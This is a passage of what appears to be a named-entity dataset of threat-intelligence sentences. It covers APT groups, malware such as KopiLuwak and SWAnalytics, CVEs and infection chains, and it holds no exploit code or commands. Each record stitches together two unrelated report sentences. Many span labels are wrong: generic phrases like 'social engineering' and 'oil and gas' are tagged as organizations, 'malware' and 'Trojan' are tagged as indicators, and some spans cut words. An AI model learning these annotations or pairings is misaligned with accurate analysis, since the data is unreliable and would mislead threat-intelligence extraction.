{"start": 197, "end": 211, "label": "Indicator"}, {"start": 258, "end": 261, "label": "System"}, {"start": 262, "end": 270, "label": "Indicator"}]} {"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . 
However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) .", "spans": [{"start": 38, "end": 47, "label": "System"}, {"start": 50, "end": 52, "label": "Malware"}, {"start": 63, "end": 89, "label": "Malware"}, {"start": 249, "end": 257, "label": "Indicator"}, {"start": 305, "end": 312, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}]} {"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 113, "end": 125, "label": "Malware"}, {"start": 186, "end": 193, "label": "Indicator"}, {"start": 219, "end": 224, "label": "Indicator"}]} {"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . 
Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 169, "end": 173, "label": "Malware"}, {"start": 252, "end": 256, "label": "System"}, {"start": 295, "end": 309, "label": "Vulnerability"}, {"start": 376, "end": 390, "label": "Indicator"}, {"start": 421, "end": 433, "label": "Indicator"}]} {"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 19, "end": 35, "label": "Malware"}, {"start": 38, "end": 57, "label": "Malware"}, {"start": 60, "end": 74, "label": "Malware"}, {"start": 77, "end": 93, "label": "Malware"}, {"start": 96, "end": 107, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}, {"start": 133, "end": 140, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 273, "end": 280, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 312, "end": 337, "label": "Indicator"}, {"start": 340, "end": 354, "label": "Indicator"}]} {"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . 
The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 29, "end": 42, "label": "Malware"}, {"start": 45, "end": 60, "label": "Malware"}, {"start": 63, "end": 76, "label": "Malware"}, {"start": 81, "end": 97, "label": "Malware"}, {"start": 403, "end": 413, "label": "Indicator"}, {"start": 428, "end": 447, "label": "Indicator"}]} {"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}, {"start": 72, "end": 87, "label": "Malware"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 264, "end": 272, "label": "Indicator"}]} {"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d .", "spans": [{"start": 4, "end": 22, "label": "Malware"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 131, "end": 140, "label": "Indicator"}, {"start": 265, "end": 278, "label": "Indicator"}]} {"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 111, "end": 124, "label": "Malware"}, {"start": 155, "end": 167, "label": "Malware"}, {"start": 302, "end": 310, "label": "Malware"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 388, "end": 399, "label": "Malware"}, {"start": 408, "end": 421, "label": "Malware"}]} {"text": "This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 80, "end": 94, "label": "Malware"}, {"start": 130, "end": 156, "label": "Malware"}, {"start": 159, "end": 170, "label": "Malware"}, {"start": 207, "end": 216, "label": "Indicator"}]} {"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . 
We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 69, "end": 79, "label": "Malware"}, {"start": 150, "end": 160, "label": "System"}, {"start": 182, "end": 192, "label": "System"}, {"start": 218, "end": 227, "label": "Indicator"}]} {"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 15, "end": 21, "label": "Malware"}, {"start": 47, "end": 54, "label": "Malware"}, {"start": 270, "end": 278, "label": "Indicator"}, {"start": 297, "end": 303, "label": "System"}]} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . 
Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 189, "end": 193, "label": "System"}, {"start": 202, "end": 209, "label": "System"}, {"start": 226, "end": 232, "label": "System"}, {"start": 257, "end": 278, "label": "Indicator"}, {"start": 287, "end": 313, "label": "Indicator"}, {"start": 316, "end": 342, "label": "Indicator"}, {"start": 349, "end": 374, "label": "Indicator"}]} {"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 125, "end": 143, "label": "Organization"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 246, "end": 253, "label": "System"}, {"start": 265, "end": 282, "label": "Indicator"}, {"start": 327, "end": 334, "label": "System"}]} {"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . 
The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d .", "spans": [{"start": 22, "end": 34, "label": "Organization"}, {"start": 85, "end": 97, "label": "Organization"}, {"start": 159, "end": 169, "label": "Indicator"}, {"start": 296, "end": 298, "label": "Indicator"}]} {"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . we identified two methods to deliver the KerrDown downloader to targets .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 26, "end": 38, "label": "Organization"}, {"start": 82, "end": 100, "label": "Organization"}, {"start": 153, "end": 161, "label": "Indicator"}]} {"text": "The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": [{"start": 46, "end": 87, "label": "Organization"}, {"start": 149, "end": 157, "label": "Indicator"}]} {"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 22, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 59, "end": 69, "label": "Organization"}, {"start": 184, "end": 192, "label": "Indicator"}]} {"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . 
The dropped PE file has the distinctive file name 8.t\u201d .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}, {"start": 74, "end": 82, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 165, "end": 167, "label": "Malware"}, {"start": 203, "end": 207, "label": "Indicator"}]} {"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 37, "end": 49, "label": "Organization"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 135, "end": 153, "label": "Organization"}, {"start": 156, "end": 178, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 195, "end": 214, "label": "Organization"}, {"start": 221, "end": 228, "label": "Indicator"}]} {"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . 
The malware starts communicating with the C&C server by sending basic information about the infected machine .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 28, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 105, "end": 122, "label": "Organization"}, {"start": 129, "end": 136, "label": "Indicator"}, {"start": 167, "end": 170, "label": "System"}]} {"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests .", "spans": [{"start": 36, "end": 41, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 144, "end": 159, "label": "Organization"}, {"start": 162, "end": 180, "label": "Organization"}, {"start": 189, "end": 200, "label": "Organization"}, {"start": 207, "end": 214, "label": "Indicator"}, {"start": 243, "end": 257, "label": "Malware"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 357, "end": 361, "label": "Indicator"}]} {"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}]} {"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . 
The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": [{"start": 36, "end": 46, "label": "Organization"}, {"start": 55, "end": 73, "label": "Organization"}, {"start": 115, "end": 118, "label": "Malware"}, {"start": 127, "end": 138, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 282, "end": 298, "label": "Organization"}, {"start": 305, "end": 321, "label": "Organization"}]} {"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers .", "spans": [{"start": 46, "end": 64, "label": "Organization"}, {"start": 93, "end": 103, "label": "Organization"}, {"start": 231, "end": 242, "label": "Indicator"}]} {"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . 
This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 108, "end": 114, "label": "Organization"}, {"start": 210, "end": 226, "label": "Organization"}, {"start": 280, "end": 286, "label": "Indicator"}]} {"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in .", "spans": [{"start": 28, "end": 46, "label": "Organization"}, {"start": 199, "end": 226, "label": "System"}, {"start": 229, "end": 233, "label": "System"}, {"start": 358, "end": 369, "label": "Organization"}, {"start": 458, "end": 469, "label": "Indicator"}]} {"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . 
With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 38, "end": 56, "label": "Organization"}, {"start": 209, "end": 236, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 368, "end": 379, "label": "Organization"}, {"start": 432, "end": 443, "label": "Indicator"}, {"start": 465, "end": 472, "label": "System"}]} {"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 220, "end": 236, "label": "Indicator"}]} {"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 75, "end": 87, "label": "System"}, {"start": 178, "end": 189, "label": "Indicator"}]} {"text": "These VNC exectuables would either be included in the SFX file or downloaded by the batch script . 
To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control .", "spans": [{"start": 6, "end": 9, "label": "System"}, {"start": 149, "end": 160, "label": "Indicator"}]} {"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d .", "spans": [{"start": 47, "end": 58, "label": "Organization"}, {"start": 91, "end": 95, "label": "Organization"}, {"start": 241, "end": 252, "label": "Indicator"}]} {"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 82, "end": 86, "label": "Organization"}, {"start": 200, "end": 212, "label": "Indicator"}]} {"text": "Gorgon Group used common URL shortening services to download payloads . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 178, "end": 185, "label": "Indicator"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 213, "end": 224, "label": "Indicator"}]} {"text": "Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . 
It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 165, "end": 177, "label": "Malware"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 318, "end": 330, "label": "Indicator"}]} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 183, "end": 195, "label": "Indicator"}]} {"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . Japan is no stranger to banking malware .", "spans": [{"start": 124, "end": 130, "label": "System"}, {"start": 159, "end": 183, "label": "Malware"}, {"start": 272, "end": 279, "label": "Indicator"}, {"start": 280, "end": 287, "label": "Indicator"}]} {"text": "All contain the same Visual Basic macro code and author name as Honeybee . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": [{"start": 64, "end": 72, "label": "Organization"}, {"start": 151, "end": 157, "label": "Indicator"}, {"start": 162, "end": 169, "label": "Indicator"}]} {"text": "Ke3chang attackers have used spear-phishing emails . 
This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 9, "end": 18, "label": "Organization"}, {"start": 99, "end": 111, "label": "Indicator"}, {"start": 147, "end": 169, "label": "Organization"}]} {"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 29, "end": 38, "label": "Organization"}, {"start": 252, "end": 258, "label": "Indicator"}, {"start": 285, "end": 294, "label": "Organization"}]} {"text": "DLL hijacking techniques have been seen in the past with the APT15 group . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B .", "spans": [{"start": 61, "end": 72, "label": "Organization"}, {"start": 89, "end": 95, "label": "Indicator"}, {"start": 108, "end": 120, "label": "Indicator"}, {"start": 180, "end": 186, "label": "Indicator"}, {"start": 204, "end": 212, "label": "Indicator"}]} {"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . 
Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio .", "spans": [{"start": 44, "end": 51, "label": "Organization"}, {"start": 129, "end": 142, "label": "Organization"}, {"start": 154, "end": 177, "label": "Organization"}, {"start": 180, "end": 187, "label": "Indicator"}, {"start": 206, "end": 212, "label": "Indicator"}]} {"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 .", "spans": [{"start": 44, "end": 51, "label": "Organization"}, {"start": 129, "end": 152, "label": "Organization"}, {"start": 219, "end": 226, "label": "Indicator"}, {"start": 231, "end": 241, "label": "Indicator"}]} {"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 108, "end": 122, "label": "Organization"}, {"start": 198, "end": 206, "label": "Indicator"}]} {"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 .", "spans": [{"start": 43, "end": 63, "label": "System"}, {"start": 122, "end": 129, "label": "System"}, {"start": 162, "end": 170, "label": "Indicator"}]} {"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . 
More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": [{"start": 72, "end": 80, "label": "System"}, {"start": 214, "end": 222, "label": "Indicator"}, {"start": 257, "end": 266, "label": "Organization"}]} {"text": "Kaspersky believes both Shamoon and StoneDrill groups are aligned in their interests , but are two separate actors , which might also indicate two different groups working together . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 31, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 254, "end": 266, "label": "Indicator"}, {"start": 293, "end": 303, "label": "Organization"}]} {"text": "Indeed , Kaspersky started tracking the BlueNoroff actor a long time ago . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 40, "end": 50, "label": "Organization"}, {"start": 145, "end": 154, "label": "Indicator"}, {"start": 222, "end": 234, "label": "Indicator"}]} {"text": "Eset\u200d has published a report on the state-sponsored Russian turla apt group \u200d. The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 60, "end": 65, "label": "Organization"}, {"start": 127, "end": 139, "label": "Indicator"}, {"start": 178, "end": 181, "label": "System"}, {"start": 194, "end": 217, "label": "Indicator"}]} {"text": "It seems Eset has discovered and published on a new malware module created by Turla . 
As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": [{"start": 9, "end": 13, "label": "Organization"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 129, "end": 139, "label": "Indicator"}, {"start": 162, "end": 174, "label": "Indicator"}, {"start": 254, "end": 263, "label": "Indicator"}]} {"text": "The majority of NewsBeef targets that Kaspersky researchers have observed are located in SA . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 97, "end": 107, "label": "Organization"}, {"start": 239, "end": 251, "label": "Indicator"}]} {"text": "While not directly overlapping , this potential infrastructure link is interesting , as Vixen Panda has previously displayed TTPs similar to COMMENT PANDA , and has extensively targeted European entities . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine .", "spans": [{"start": 88, "end": 99, "label": "Organization"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 227, "end": 236, "label": "Indicator"}, {"start": 281, "end": 284, "label": "System"}]} {"text": "Given the evidence outlined above , CrowdStrike attributes the PUTTER PANDA group to PLA Unit 61486 within Shanghai , China with high confidence . 
We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": [{"start": 36, "end": 47, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 89, "end": 99, "label": "Organization"}, {"start": 198, "end": 210, "label": "Indicator"}, {"start": 231, "end": 242, "label": "Indicator"}]} {"text": "Several RATs are used by PUTTER PANDA . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan .", "spans": [{"start": 8, "end": 12, "label": "System"}, {"start": 25, "end": 37, "label": "Organization"}, {"start": 56, "end": 67, "label": "Indicator"}, {"start": 92, "end": 112, "label": "Indicator"}, {"start": 113, "end": 119, "label": "Malware"}]} {"text": "The most common of these , the 4H RAT and the 3PARA RAT , have been documented previously by CrowdStrike in previous CrowdStrike Intelligence reporting . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 46, "end": 55, "label": "System"}, {"start": 93, "end": 104, "label": "Organization"}, {"start": 117, "end": 141, "label": "Organization"}, {"start": 154, "end": 165, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}]} {"text": "This analysis will be revisited below , along with an examination of two other PUTTER PANDA tools : pngdowner and httpclient . 
These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d .", "spans": [{"start": 79, "end": 91, "label": "Organization"}, {"start": 100, "end": 109, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 192, "end": 211, "label": "Indicator"}, {"start": 216, "end": 225, "label": "Indicator"}, {"start": 231, "end": 259, "label": "Indicator"}]} {"text": "Other CrowdStrike reporting describes a dropper used by PUTTER PANDA to install the 4H RAT . These campaign-related VPSs are located in South Africa . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": [{"start": 6, "end": 17, "label": "Organization"}, {"start": 40, "end": 47, "label": "System"}, {"start": 56, "end": 68, "label": "Organization"}, {"start": 84, "end": 90, "label": "System"}, {"start": 116, "end": 120, "label": "Organization"}, {"start": 184, "end": 190, "label": "Indicator"}]} {"text": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it . The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 18, "end": 21, "label": "System"}, {"start": 145, "end": 155, "label": "System"}, {"start": 171, "end": 177, "label": "Malware"}]} {"text": "It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . 
The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot .", "spans": [{"start": 14, "end": 27, "label": "Malware"}, {"start": 54, "end": 90, "label": "Malware"}, {"start": 122, "end": 132, "label": "Malware"}, {"start": 145, "end": 157, "label": "Malware"}, {"start": 166, "end": 172, "label": "Indicator"}, {"start": 197, "end": 218, "label": "Indicator"}]} {"text": "PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 40, "end": 45, "label": "Organization"}, {"start": 167, "end": 179, "label": "Organization"}, {"start": 204, "end": 212, "label": "Indicator"}, {"start": 251, "end": 257, "label": "Organization"}]} {"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. 
, possibly en masse .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 156, "end": 181, "label": "Organization"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 271, "label": "Indicator"}, {"start": 383, "end": 393, "label": "Indicator"}]} {"text": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 166, "end": 175, "label": "Indicator"}, {"start": 180, "end": 190, "label": "Indicator"}]} {"text": "Mandiant 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 12, "end": 16, "label": "Organization"}, {"start": 81, "end": 107, "label": "Organization"}, {"start": 127, "end": 140, "label": "Organization"}, {"start": 185, "end": 195, "label": "Indicator"}, {"start": 344, "end": 351, "label": "Vulnerability"}, {"start": 356, "end": 362, "label": "System"}, {"start": 381, "end": 395, "label": "Vulnerability"}]} {"text": "Mandianta 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . 
